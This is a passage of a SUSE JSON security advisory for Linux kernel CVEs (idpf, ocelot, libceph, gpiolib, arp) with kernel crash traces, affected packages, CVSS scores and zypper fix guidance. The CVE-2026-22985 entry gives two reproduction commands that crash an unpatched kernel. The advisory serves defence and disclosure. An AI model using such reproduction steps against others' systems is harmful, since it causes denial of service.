ifup/down:\n[408471.398966] idpf 0000:83:00.0: HW reset detected\n[408471.411744] idpf 0000:83:00.0: Device HW Reset initiated\n[408472.277901] idpf 0000:83:00.0: The driver was unable to contact the device\u0027s firmware. Check that the FW is running. Driver state= 0x2\n[408508.125551] BUG: kernel NULL pointer dereference, address: 0000000000000078\n[408508.126112] #PF: supervisor read access in kernel mode\n[408508.126687] #PF: error_code(0x0000) - not-present page\n[408508.127256] PGD 2aae2f067 P4D 0\n[408508.127824] Oops: Oops: 0000 [#1] SMP NOPTI\n...\n[408508.130871] RIP: 0010:idpf_stop+0x39/0x70 [idpf]\n...\n[408508.139193] Call Trace:\n[408508.139637] \u003cTASK\u003e\n[408508.140077] __dev_close_many+0xbb/0x260\n[408508.140533] __dev_change_flags+0x1cf/0x280\n[408508.140987] netif_change_flags+0x26/0x70\n[408508.141434] dev_change_flags+0x3d/0xb0\n[408508.141878] devinet_ioctl+0x460/0x890\n[408508.142321] inet_ioctl+0x18e/0x1d0\n[408508.142762] ? _copy_to_user+0x22/0x70\n[408508.143207] sock_do_ioctl+0x3d/0xe0\n[408508.143652] sock_ioctl+0x10e/0x330\n[408508.144091] ? find_held_lock+0x2b/0x80\n[408508.144537] __x64_sys_ioctl+0x96/0xe0\n[408508.144979] do_syscall_64+0x79/0x3d0\n[408508.145415] entry_SYSCALL_64_after_hwframe+0x76/0x7e\n[408508.145860] RIP: 0033:0x7f3e0bb4caff",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22981",
"url": "https://www.suse.com/security/cve/CVE-2026-22981"
},
{
"category": "external",
"summary": "SUSE Bug 1257225 for CVE-2026-22981",
"url": "https://bugzilla.suse.com/1257225"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2026-22981"
},
{
"cve": "CVE-2026-22982",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22982"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: mscc: ocelot: Fix crash when adding interface under a lag\n\nCommit 15faa1f67ab4 (\"lan966x: Fix crash when adding interface under a lag\")\nfixed a similar issue in the lan966x driver caused by a NULL pointer dereference.\nThe ocelot_set_aggr_pgids() function in the ocelot driver has similar logic\nand is susceptible to the same crash.\n\nThis issue specifically affects the ocelot_vsc7514.c frontend, which leaves\nunused ports as NULL pointers. The felix_vsc9959.c frontend is unaffected as\nit uses the DSA framework which registers all ports.\n\nFix this by checking if the port pointer is valid before accessing it.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22982",
"url": "https://www.suse.com/security/cve/CVE-2026-22982"
},
{
"category": "external",
"summary": "SUSE Bug 1257179 for CVE-2026-22982",
"url": "https://bugzilla.suse.com/1257179"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2026-22982"
},
{
"cve": "CVE-2026-22984",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22984"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: prevent potential out-of-bounds reads in handle_auth_done()\n\nPerform an explicit bounds check on payload_len to avoid a possible\nout-of-bounds access in the callout.\n\n[ idryomov: changelog ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22984",
"url": "https://www.suse.com/security/cve/CVE-2026-22984"
},
{
"category": "external",
"summary": "SUSE Bug 1257217 for CVE-2026-22984",
"url": "https://bugzilla.suse.com/1257217"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2026-22984"
},
{
"cve": "CVE-2026-22985",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22985"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nidpf: Fix RSS LUT NULL pointer crash on early ethtool operations\n\nThe RSS LUT is not initialized until the interface comes up, causing\nthe following NULL pointer crash when ethtool operations like rxhash on/off\nare performed before the interface is brought up for the first time.\n\nMove RSS LUT initialization from ndo_open to vport creation to ensure LUT\nis always available. This enables RSS configuration via ethtool before\nbringing the interface up. Simplify LUT management by maintaining all\nchanges in the driver\u0027s soft copy and programming zeros to the indirection\ntable when rxhash is disabled. Defer HW programming until the interface\ncomes up if it is down during rxhash and LUT configuration changes.\n\nSteps to reproduce:\n** Load idpf driver; interfaces will be created\n\tmodprobe idpf\n** Before bringing the interfaces up, turn rxhash off\n\tethtool -K eth2 rxhash off\n\n[89408.371875] BUG: kernel NULL pointer dereference, address: 0000000000000000\n[89408.371908] #PF: supervisor read access in kernel mode\n[89408.371924] #PF: error_code(0x0000) - not-present page\n[89408.371940] PGD 0 P4D 0\n[89408.371953] Oops: Oops: 0000 [#1] SMP NOPTI\n\u003csnip\u003e\n[89408.372052] RIP: 0010:memcpy_orig+0x16/0x130\n[89408.372310] Call Trace:\n[89408.372317] \u003cTASK\u003e\n[89408.372326] ? idpf_set_features+0xfc/0x180 [idpf]\n[89408.372363] __netdev_update_features+0x295/0xde0\n[89408.372384] ethnl_set_features+0x15e/0x460\n[89408.372406] genl_family_rcv_msg_doit+0x11f/0x180\n[89408.372429] genl_rcv_msg+0x1ad/0x2b0\n[89408.372446] ? __pfx_ethnl_set_features+0x10/0x10\n[89408.372465] ? __pfx_genl_rcv_msg+0x10/0x10\n[89408.372482] netlink_rcv_skb+0x58/0x100\n[89408.372502] genl_rcv+0x2c/0x50\n[89408.372516] netlink_unicast+0x289/0x3e0\n[89408.372533] netlink_sendmsg+0x215/0x440\n[89408.372551] __sys_sendto+0x234/0x240\n[89408.372571] __x64_sys_sendto+0x28/0x30\n[89408.372585] x64_sys_call+0x1909/0x1da0\n[89408.372604] do_syscall_64+0x7a/0xfa0\n[89408.373140] ? clear_bhb_loop+0x60/0xb0\n[89408.373647] entry_SYSCALL_64_after_hwframe+0x76/0x7e\n[89408.378887] \u003c/TASK\u003e\n\u003csnip\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22985",
"url": "https://www.suse.com/security/cve/CVE-2026-22985"
},
{
"category": "external",
"summary": "SUSE Bug 1257277 for CVE-2026-22985",
"url": "https://bugzilla.suse.com/1257277"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2026-22985"
},
{
"cve": "CVE-2026-22986",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22986"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ngpiolib: fix race condition for gdev-\u003esrcu\n\nIf two drivers were calling gpiochip_add_data_with_key(), one may be\ntraversing the srcu-protected list in gpio_name_to_desc(), meanwhile\nother has just added its gdev in gpiodev_add_to_list_unlocked().\nThis creates a non-mutexed and non-protected timeframe, when one\ninstance is dereferencing and using \u0026gdev-\u003esrcu, before the other\nhas initialized it, resulting in crash:\n\n[ 4.935481] Unable to handle kernel paging request at virtual address ffff800272bcc000\n[ 4.943396] Mem abort info:\n[ 4.943400] ESR = 0x0000000096000005\n[ 4.943403] EC = 0x25: DABT (current EL), IL = 32 bits\n[ 4.943407] SET = 0, FnV = 0\n[ 4.943410] EA = 0, S1PTW = 0\n[ 4.943413] FSC = 0x05: level 1 translation fault\n[ 4.943416] Data abort info:\n[ 4.943418] ISV = 0, ISS = 0x00000005, ISS2 = 0x00000000\n[ 4.946220] CM = 0, WnR = 0, TnD = 0, TagAccess = 0\n[ 4.955261] GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0\n[ 4.955268] swapper pgtable: 4k pages, 48-bit VAs, pgdp=0000000038e6c000\n[ 4.961449] [ffff800272bcc000] pgd=0000000000000000\n[ 4.969203] , p4d=1000000039739003\n[ 4.979730] , pud=0000000000000000\n[ 4.980210] phandle (CPU): 0x0000005e, phandle (BE): 0x5e000000 for node \"reset\"\n[ 4.991736] Internal error: Oops: 0000000096000005 [#1] PREEMPT SMP\n...\n[ 5.121359] pc : __srcu_read_lock+0x44/0x98\n[ 5.131091] lr : gpio_name_to_desc+0x60/0x1a0\n[ 5.153671] sp : ffff8000833bb430\n[ 5.298440]\n[ 5.298443] Call trace:\n[ 5.298445] __srcu_read_lock+0x44/0x98\n[ 5.309484] gpio_name_to_desc+0x60/0x1a0\n[ 5.320692] gpiochip_add_data_with_key+0x488/0xf00\n 5.946419] ---[ end trace 0000000000000000 ]---\n\nMove initialization code for gdev fields before it is added to\ngpio_devices, with adjacent initialization code.\nAdjust goto statements to reflect modified order of operations\n\n[Bartosz: fixed a build issue, removed stray newline]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22986",
"url": "https://www.suse.com/security/cve/CVE-2026-22986"
},
{
"category": "external",
"summary": "SUSE Bug 1257276 for CVE-2026-22986",
"url": "https://bugzilla.suse.com/1257276"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2026-22986"
},
{
"cve": "CVE-2026-22988",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22988"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\narp: do not assume dev_hard_header() does not change skb-\u003ehead\n\narp_create() is the only dev_hard_header() caller\nmaking assumption about skb-\u003ehead being unchanged.\n\nA recent commit broke this assumption.\n\nInitialize @arp pointer after dev_hard_header() call.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22988",
"url": "https://www.suse.com/security/cve/CVE-2026-22988"
},
{
"category": "external",
"summary": "SUSE Bug 1257282 for CVE-2026-22988",
"url": "https://bugzilla.suse.com/1257282"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
